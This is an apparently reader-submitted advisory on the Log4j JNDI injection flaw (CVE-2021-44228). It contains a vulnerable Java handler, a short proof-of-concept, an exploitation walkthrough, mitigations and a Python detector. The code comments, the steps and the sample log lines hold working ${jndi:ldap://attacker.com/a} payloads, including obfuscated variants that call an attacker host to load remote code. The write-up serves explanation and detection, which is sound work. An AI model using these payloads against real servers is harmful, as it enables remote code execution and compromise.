Apache Log4j Vulnerability (JNDI Injection, CVE-2021-44228)

Reader submission 332 2022-09-22


Vulnerability

Affected versions

2.0 <= Apache log4j <= 2.14.1

Exploitation

import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
// Log4j 2 API: the affected library (the original snippet imported the Log4j 1.x Logger by mistake).
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import java.io.IOException;
import java.io.OutputStream;

public class VulnerableLog4jExampleHandler implements HttpHandler {

    static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class);

    /**
     * A simple HTTP endpoint that reads the request's User-Agent and logs it back.
     * This is basically pseudo-code to explain the vulnerability, and not a full example.
     * @param he HTTP Request Object
     */
    public void handle(HttpExchange he) throws IOException {
        String userAgent = he.getRequestHeaders().getFirst("User-Agent");

        // This line triggers the RCE by logging the attacker-controlled HTTP User-Agent header.
        // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
        log.info("Request User Agent:" + userAgent);

        String response = "Hello There, " + userAgent + "!";
        he.sendResponseHeaders(200, response.length());
        OutputStream os = he.getResponseBody();
        os.write(response.getBytes());
        os.close();
    }
}

1. Data from the user gets sent to the server (via any protocol).
2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
3. The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via the Java Naming and Directory Interface (JNDI).
4. This response contains a path to a remote Java class file, which is injected into the server process.
5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

Another approach:

import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;

public class Poc {
    private static final Logger log = LogManager.getLogger();

    public static void main(String[] args) {
        // The lookup is resolved while the message is formatted, so logging it is enough to trigger it.
        log.error("${jndi:rmi://127.0.0.1:1099/xxxx}");
    }
}

Mitigations

a. Set the JVM parameter -Dlog4j2.formatMsgNoLookups=true
b. Set the configuration property log4j2.formatMsgNoLookups=True
c. Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
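As an added example (not from the original post), the defender's side of the payload above: a small Python detector that flags the ${jndi:...} lookup in collected log or request records. It goes beyond the single payload form shown in the text by first collapsing nested lower/upper/default-value lookups, which Log4j resolves before the jndi prefix is evaluated and which public detection rules account for; the log lines are constructed and the normalization is a simplified model of Log4j's substitution, not its code.

```python
import re

# Innermost ${...} lookup: a body with no nested '$', '{' or '}' inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The dangerous prefix, matched only after nested lookups have been collapsed.
_JNDI_PREFIX = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(match):
    """Resolve one innermost lookup (simplified model of Log4j's substitutor):
    ${anything:-default} -> default; ${lower:X} / ${upper:X} -> case-converted X.
    Any other lookup, jndi itself included, is left in place unchanged."""
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, value = body.partition(":")
    if prefix.lower() == "lower":
        return value.lower()
    if prefix.lower() == "upper":
        return value.upper()
    return match.group(0)


def normalize(message, max_rounds=20):
    """Collapse nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        resolved = _INNER_LOOKUP.sub(_resolve_inner, message)
        if resolved == message:
            break
        message = resolved
    return message


def is_jndi_lookup(message):
    """True when the message, after normalization, contains a ${jndi:...} lookup."""
    return _JNDI_PREFIX.search(normalize(message)) is not None


def scan_log_lines(lines):
    """Return the indices of lines carrying a (possibly nested) JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


# Constructed sample access-log lines (the User-Agent is the last quoted field).
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Sep/2022] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - [22/Sep/2022] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.com/a}"',
    '10.0.0.7 - - [22/Sep/2022] "GET / HTTP/1.1" 200 "${${lower:J}ndi:ldap://attacker.com/a}"',
    '10.0.0.8 - - [22/Sep/2022] "GET / HTTP/1.1" 200 "${${::-j}ndi:rmi://127.0.0.1:1099/xxxx}"',
    '10.0.0.9 - - [22/Sep/2022] "GET / HTTP/1.1" 200 "${env:HOME} is not a JNDI lookup"',
]
```

Run scan_log_lines over web access logs or the application's own log output to find attempts and the hosts that need checking; the lookup switches above were later found to cover only the default configuration, so upgrading Log4j is the durable fix.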

References

https://v2ex.com/t/821241
